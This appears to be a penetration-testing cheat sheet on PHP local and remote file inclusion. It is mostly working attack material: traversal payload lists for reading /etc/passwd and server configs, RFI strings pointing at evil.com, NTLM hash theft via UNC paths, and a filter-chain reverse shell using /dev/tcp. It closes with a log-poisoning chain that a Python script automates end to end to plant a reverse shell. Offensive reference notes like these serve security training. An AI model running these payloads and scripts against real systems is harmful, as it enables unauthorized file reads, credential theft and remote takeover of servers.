Pentest Notes

File Inclusion (LFI/RFI)

Last modified: 2023-05-17

Web

Local File Inclusion (LFI) and Remote File Inclusion (RFI) affect web applications that pass user-controlled input to a file-inclusion call of their scripting runtime (for example PHP's include/require). LFI reads or executes files that already exist on the server; RFI pulls the included file from a host we control, which in PHP additionally requires allow_url_include=On.

Local File Inclusion (LFI)

?page=../
?page=/etc/passwd
?page=../../../../etc/passwd
?page=../../../../../etc/passwd
?page=..//..//..//..//..//etc/passwd
?page=....//....//....//....//etc/passwd
?page=....//....//....//....//....//....//etc/passwd
?page=../../../../../../../../../../../../../../etc/passwd
?page=..\/..\/..\/..\/etc/passwd
?page=..%2F..%2F..%2F..%2Fetc/passwd
?page=..%5C..%5C..%5C..%5cetc/passwd
?page=..%252f..%252f..%252f..%252fetc/passwd
?page=/etc/passwd&
?page=/etc/passwd%00
?page=/etc/passwd%00.inc
?page=/etc/passwd%00.php
?page=http://localhost/index
?page=http:%5c%5cindex
?page=http:%252f%252findex
?page=somedir/../../../../etc/passwd&ext=

# File scheme
?page=file:///etc/passwd
?page=file:%2F%2F%2Fetc%2Fpasswd
?page=file:%252F%252F%252Fetc%252Fpasswd
?page=file%3A///etc/passwd
?page=file%3A%2F%2F%2Fetc%2Fpasswd
?page=file%3A%252F%252F%252Fetc%252Fpasswd
?page=file://var/www/html/index.php
?page=file://var/www/<subdomain>/index.php

# Host
?page=/etc/hosts
# Cron
?page=/etc/crontab

# Web root
?page=/var/www/html/index.html
?page=/var/www/html/index.php
?page=/var/www/example.com/index.php
?page=/var/www/subdomain/index.php
?page=/var/www/subdomain.example.com/index.php
?page=/var/www/wordpress/index.php

# Apache
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/apache2/sites-enabled/domain.conf
?page=/etc/apache2/sites-enabled/example.com.conf
?page=/etc/apache2/sites-enabled/sub.example.com.conf
?page=/etc/apache2/sites-enabled/sub.conf
?page=/etc/apache2/sites-available/domain.conf
?page=/etc/apache2/sites-available/example.com.conf
?page=/etc/apache2/sites-available/sub.example.com.conf
?page=/etc/apache2/sites-available/sub.conf
?page=/etc/apache2/.htpasswd
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log

# Nginx
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/etc/nginx/nginx.conf
?page=/etc/nginx/conf.d/.htpasswd
?page=/etc/nginx/conf.d/example.com.conf
?page=/etc/nginx/conf.d/example.conf
?page=/etc/nginx/conf.d/subdomain.example.com.conf
?page=/etc/nginx/conf.d/subdomain.conf
?page=/etc/nginx/sites-available/example.com.conf
?page=/etc/nginx/sites-enabled/example.com.conf
?page=/usr/local/nginx/conf/nginx.conf
?page=/usr/local/etc/nginx/nginx.conf

# PHP web conf
?page=/etc/php/x.x/apache2/php.ini
?page=/etc/php/x.x/cli/php.ini
?page=/etc/php/x.x/fpm/php.ini

# BIND
?page=/etc/bind/named.conf
?page=/etc/bind/named.conf.options
?page=/etc/bind/named.conf.local
?page=/etc/bind/named.conf.default-zones

# PHP wrappers: php://filter returns the file encoded instead of executing it, so PHP source can be read
?page=php://filter/resource=/etc/passwd
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://filter/convert.base64-encode/resource=index.php
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
# data:// executes the supplied code; needs allow_url_include=On
?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
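The php://filter lines above return a file's contents encoded rather than executed, which is how PHP source is read through an LFI. The script below is an added example for these notes (not from the original page or from any tool it mentions): it builds those wrapper values and reverses them on the response, including the zlib.deflate case. PHP's deflate filter writes raw DEFLATE without a zlib header, so the decoder tries wbits=-15 first. The resource paths and the simulated target page are constructed for illustration.

```python
"""php_filter_read.py: build the php://filter values listed above and decode
what the vulnerable include() sends back.

Added example for this page (not part of the original notes or of any tool
they mention). The resource paths and the simulated target page are
constructed for illustration."""
import base64
import re
import zlib

# The include is usually wrapped in the template's HTML; the blob is the
# longest run of base64 alphabet characters in the page.
BASE64_RUN = re.compile(rb"[A-Za-z0-9+/=]{16,}")


def filter_payload(resource: str, compress: bool = False) -> str:
    """php://filter value that hands back `resource` base64-encoded instead of
    executing it; compress=True inserts zlib.deflate first, which keeps large
    files short enough to survive output truncation."""
    chain = "zlib.deflate/convert.base64-encode" if compress else "convert.base64-encode"
    return f"php://filter/{chain}/resource={resource}"


def decode_filter_output(body: bytes, compressed: bool = False) -> bytes:
    """Reverse filter_payload(): pick the base64 blob out of the page, decode
    it, and inflate it if zlib.deflate was in the chain."""
    runs = BASE64_RUN.findall(body)
    if not runs:
        raise ValueError("no base64 blob in response: the include probably failed")
    data = base64.b64decode(max(runs, key=len))
    if compressed:
        try:
            # PHP's zlib.deflate filter emits raw DEFLATE (no zlib header).
            data = zlib.decompress(data, -15)
        except zlib.error:
            # Fall back to the zlib-wrapped form in case the target set a window parameter.
            data = zlib.decompress(data)
    return data


def simulate_target(file_bytes: bytes, compress: bool = False) -> bytes:
    """Constructed stand-in for the vulnerable page: what include() of the
    filter URL would emit when the template wraps the output in HTML."""
    data = file_bytes
    if compress:
        c = zlib.compressobj(wbits=-15)      # raw DEFLATE, as PHP's filter does
        data = c.compress(data) + c.flush()
    return b"<html><body>" + base64.b64encode(data) + b"</body></html>"


if __name__ == "__main__":
    source = b"<?php\n$db_pass = 'hunter2';\ninclude($_GET['page']);\n"  # constructed index.php
    for compress in (False, True):
        print(filter_payload("index.php", compress))
        page = simulate_target(source, compress)
        assert decode_filter_output(page, compress) == source
    print(decode_filter_output(simulate_target(source)).decode())
```

Against a live target, request `?page=` + `filter_payload(path)` and feed `resp.content` to `decode_filter_output`; the rot13 variant from the list decodes with `codecs.decode(text, "rot13")` instead.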

# Windows
?page=../../../../../../../../windows/system32/drivers/etc/hosts
?page=C:/Windows/System32/drivers/etc/hosts
?page=C:/Users/Public/Desktop/desktop.ini
?page=C:/Users/FUZZ/Desktop/desktop.ini # user enumeration
?page=C:/inetpub/wwwroot/
?page=C:/xampp/apache/conf/httpd.conf
?page=C:/xampp/apache/conf/extra/httpd-userdir.conf
?page=C:/xampp/apache/conf/extra/httpd-vhosts.conf
?page=C:/xampp/apache/conf/extra/httpd-xampp.conf
?page=C:/xampp/apache/conf/extra/httpd-ajp.conf
?page=C:/xampp/apache/logs/access.log
?page=C:/xampp/apache/logs/error.log
?page=C:/xampp/cgi-bin/example.cgi
?page=C:/xampp/htdocs/example.com/index.php
?page=C:/xampp/htdocs/sub.example.com/index.php
?page=C:/xampp/phpMyAdmin/index.php
?page=C:/xampp/phpMyAdmin/config.inc.php

Automation

# Filter the error page with -fs <size> (or match a known string with -mr) to cut false positives
ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
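The ffuf runs above tell you which wordlist entry returned something; the script below is an added worked example for these notes (not from the original page or from ffuf). It generates the traversal encodings from the list at the top for one target file, emulates the naive filter that the ....// variant is meant to defeat, and distinguishes a real file read from PHP's include warning by matching a signature of the file contents. The parameter name page, the traversal depth and the target URL are assumptions.

```python
"""lfi_probe.py: build the traversal variants from the list above for one
target file and tell a real file read apart from an error page.

Added example for this page, not from any tool the page mentions. The
parameter name "page", the depth, the target URL and the naive filter that
the variants are meant to defeat are assumptions for illustration."""
import re
import sys
import urllib.parse
from typing import List, Optional, Tuple

# Signatures proving the include returned the file itself, not a PHP warning.
SIGNATURES = {
    "/etc/passwd": re.compile(rb"^root:[^:\n]*:0:0:", re.M),
    "/etc/hosts": re.compile(rb"^127\.0\.0\.1\s+localhost", re.M),
    "windows hosts": re.compile(rb"Microsoft Corp\.", re.I),   # heuristic: header comment of the stock file
}


def traversal_variants(target: str, depth: int = 6) -> List[str]:
    """Return encodings of (../ * depth) + target. target is relative to the
    filesystem root, e.g. 'etc/passwd'. Cheapest variants come first."""
    ups = "../" * depth
    once = urllib.parse.quote(ups, safe="")            # ..%2F..%2F...
    twice = urllib.parse.quote(once, safe="")          # ..%252F..%252F... for a decode-then-check filter
    return [
        "/" + target,                                  # absolute path, no traversal at all
        ups + target,                                  # plain ../
        "....//" * depth + target,                     # survives one strip of '../'
        "..\\/" * depth + target,                      # backslash before the slash
        once + target,
        twice + target,
        ups + target + "%00",                          # null byte: PHP < 5.3.4 dropped an appended extension
        ups + target + "%00.php",
    ]


def naive_strip_once(path: str) -> str:
    """The filter that explains the '....//' variant: it removes the literal
    '../' a single time, so '....//' collapses back into '../'."""
    return path.replace("../", "")


def matched_signature(body: bytes) -> Optional[str]:
    """Name of the known file the body looks like, or None if nothing matched."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(body):
            return name
    return None


def probe(base_url: str, param: str, target: str) -> List[Tuple[str, str]]:
    """Send each variant and collect (payload, signature) for those that read the file."""
    import requests  # only needed for a live run
    hits = []
    for payload in traversal_variants(target):
        # The payload is already encoded where intended, so the URL is built by
        # hand instead of passing params= (which would turn '%' into '%25').
        resp = requests.get(f"{base_url}?{param}={payload}", timeout=10)
        sig = matched_signature(resp.content)
        if sig:
            hits.append((payload, sig))
    return hits


if __name__ == "__main__":
    # Constructed response bodies: what a hit and a miss look like.
    hit = b"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    miss = b"<b>Warning</b>: include(../../etc/passwd): Failed to open stream"
    print(matched_signature(hit), matched_signature(miss))
    print(naive_strip_once("....//....//etc/passwd"))
    if len(sys.argv) == 3:
        for payload, sig in probe(sys.argv[1], sys.argv[2], "etc/passwd"):
            print(f"[+] {sig} via {payload}")
```

Run it as `python3 lfi_probe.py http://example.com/index.php page` to try every variant; without arguments it only exercises the detector on the constructed bodies.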

Read Process Commands

We can recover the command lines of running processes by reading /proc/<PID>/cmdline through the inclusion (/proc/self/cmdline resolves to the process serving our request, so it is worth trying first).
The Python script below enumerates PIDs; the "This leaves the server vulnerable to Local File Inclusion." section of the referenced blog post walks through the same approach.

# lfi.py
import requests
import time

# PIDs are small integers; widen the range once the first hit confirms the read works.
for pid in range(1, 1000):
    print(f"[+] Trying {pid}")
    # f-string: concatenating the int directly to the string raises TypeError
    url = f"http://example.com/?file=/proc/{pid}/cmdline"
    resp = requests.get(url)
    if resp.content:
        # cmdline separates arguments with NUL bytes; turn them into spaces
        print(resp.content.replace(b"\x00", b" ").decode(errors="replace"))
    time.sleep(1)

Then execute this file.

python3 lfi.py

Remote File Inclusion (RFI)

?page=//evil.com/exploit
?page=%2F%2fevil.com/exploit
?page=%2C%2Cevil.com/exploit
?page=http://evil.com/exploit
?page=http%3A//evil.com/exploit
?page=http%3A%2F%2Fevil%2Ecom/exploit
?page=http%253A%252F%252Fevil%252Ecom/
?page=test@sub.example.com/

Steal NTLM Hashes (Windows)

If the web server runs on Windows, including a UNC path makes the server authenticate to our SMB listener, so we can capture Net-NTLMv2 hashes with Responder.
On the attacking machine, start Responder.

# -I: Interface e.g. eth0, tun0, etc.
sudo responder -I tun0

Then request https://example.com/?page=//<local-ip>/test.
If the server connects back, Responder prints the captured hash.
It can then be cracked with John the Ripper or Hashcat; see the page on cracking NTLM.


Remote Code Execution (RCE)

php_filter_chain_generator is a CLI that turns arbitrary PHP code into a php://filter chain (a series of convert.iconv conversions ending in resource=php://temp). Because the chain itself produces the PHP, including it gives code execution with no file write, no log access and no allow_url_include.
Below is the invocation for a reverse shell (replace 10.0.0.1:4444 with your listener).

wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py
python3 php_filter_chain_generator.py --chain "<?php system('bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\"')?>"

Start a listener (nc -lvnp 4444), then send the generated chain as the value of the vulnerable parameter, e.g. ?page=php://filter/convert.iconv.... The chain is long; if the server rejects the URL length, send it in a POST body where the application also reads the parameter from there.


Log Poisoning

1. Check if You Can Access the Apache Log File

# Debian, Ubuntu Linux
/?page=/var/log/apache/access.log
/?page=../../../../var/log/apache/access.log
/?page=/var/log/apache2/access.log
/?page=../../../../var/log/apache2/access.log

# FreeBSD
/?page=/var/log/httpd-access.log
/?page=../../../../var/log/httpd-access.log

# CentOS, Fedora, RedHat Linux
/?page=/var/log/httpd/access_log
/?page=../../../../var/log/httpd/access_log

2. Prepare the Payload for PHP Reverse Shell

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

# Edit the values in the payload
$ip = '<attacker-ip>';
$port = 4444;

3. Host the Payload on the Attacking Machine

# Port 80 needs root; any port works as long as the URL in step 4 matches
python -m http.server 80

4. Inject PHP Payload in the User-Agent

Send a GET request with the stager in the User-Agent header. The header is written verbatim into access.log (no URL-encoding happens), so the PHP tags survive. Use single quotes only: Apache logs a double quote as \", which PHP cannot parse.
When the log is later included, the stager downloads shell.php from our http.server into the PHP process's working directory (normally the web root), so the shell ends up at /shell.php on the target.

GET / HTTP/1.1
...
User-Agent: <?php file_put_contents('shell.php', file_get_contents('http://<attacker-ip>/shell.php'));  ?>

5. Trigger the Stager

Include the poisoned log: /index.php?page=../../../../var/log/apache2/access.log .
Every include re-executes everything in the log, so a syntax error in a poisoned line breaks this path for good; check the stager parses (php -l) before sending it.

6. Open Listener for Reverse Shell

On the attacking machine, start a listener on the port set in step 2.

nc -lvnp 4444

7. Gain Access to Shell

Request /shell.php on the target.
If everything worked, the listener receives a shell.
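Steps 1 to 7 above as one script, added here as a worked example (it is not part of the original notes). It checks that the log is readable before writing to it, builds a stager that avoids the double-quote escaping problem, poisons the User-Agent, includes the log and calls the dropped shell. The parameter name page, the log path, the attacker address and the target URL are assumptions taken from the command line, and the sample log is constructed.

```python
"""log_poison.py: steps 1 to 7 above as one script.

Added example for this page, not the original notes. The parameter name
"page", the log path, the attacker address and the target URL are assumptions
taken from the command line; the sample log below is constructed."""
import re
import sys
import time

# Apache "combined" format. The User-Agent is the last quoted field and is
# written to disk verbatim (only a double quote is escaped), which is why
# the stager survives the trip through the log.
COMBINED_LINE = re.compile(
    rb'^\S+ \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>.*)"$', re.M
)

# Constructed: what access.log looks like after step 4 and step 5.
SAMPLE_LOG = (
    b'10.0.0.1 - - [17/May/2023:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" '
    b'"<?php file_put_contents(\'shell.php\', file_get_contents(\'http://10.0.0.1/shell.php\')); ?>"\n'
    b'10.0.0.1 - - [17/May/2023:10:00:01 +0000] "GET /index.php?page=/var/log/apache2/access.log HTTP/1.1" 200 2048 "-" "Mozilla/5.0"\n'
)


def build_stager(attacker_ip: str, name: str = "shell.php") -> str:
    """The PHP one-liner for the User-Agent. Single quotes only: Apache logs a
    double quote as \\", which PHP cannot parse, and a parse error in the log
    is permanent because every later include re-parses the whole file."""
    return (f"<?php file_put_contents('{name}', "
            f"file_get_contents('http://{attacker_ip}/{name}')); ?>")


def log_looks_like_apache(body: bytes) -> bool:
    """Step 1: the LFI response must contain combined-format lines, not a PHP warning."""
    return COMBINED_LINE.search(body) is not None


def user_agents(body: bytes) -> list:
    """Every User-Agent recorded in a dumped log (to confirm the stager landed intact)."""
    return [m.group("ua") for m in COMBINED_LINE.finditer(body)]


def run(base: str, param: str, log_path: str, attacker_ip: str) -> int:
    """Steps 1, 4, 5 and 7 against a live target; returns the status of /shell.php."""
    import requests  # only needed for a live run
    s = requests.Session()
    include_url = f"{base}?{param}={log_path}"
    # 1. never write into a log you cannot read back
    if not log_looks_like_apache(s.get(include_url, timeout=10).content):
        sys.exit(f"[-] {log_path} is not readable through {param}")
    # 4. the header is sent raw, so <?php ... ?> reaches the log unencoded
    s.get(base, headers={"User-Agent": build_stager(attacker_ip)}, timeout=10)
    # 5. including the log executes the stager; it fetches shell.php from the
    #    http.server of step 3 into the PHP process's cwd (normally the web root)
    s.get(include_url, timeout=10)
    time.sleep(1)
    # 7. hit the dropped shell; the listener from step 6 receives the connection
    shell_url = base.rsplit("/", 1)[0] + "/shell.php"
    return s.get(shell_url, timeout=10).status_code


if __name__ == "__main__":
    if len(sys.argv) != 5:
        print(user_agents(SAMPLE_LOG))
        sys.exit(f"usage: {sys.argv[0]} http://target/index.php page /var/log/apache2/access.log <attacker-ip>")
    print("[+] shell.php returned", run(*sys.argv[1:]))
```

Before running it live, the http.server from step 3 and the nc listener from step 6 must already be up, otherwise the stager executes, finds nothing to download and leaves an empty shell.php behind.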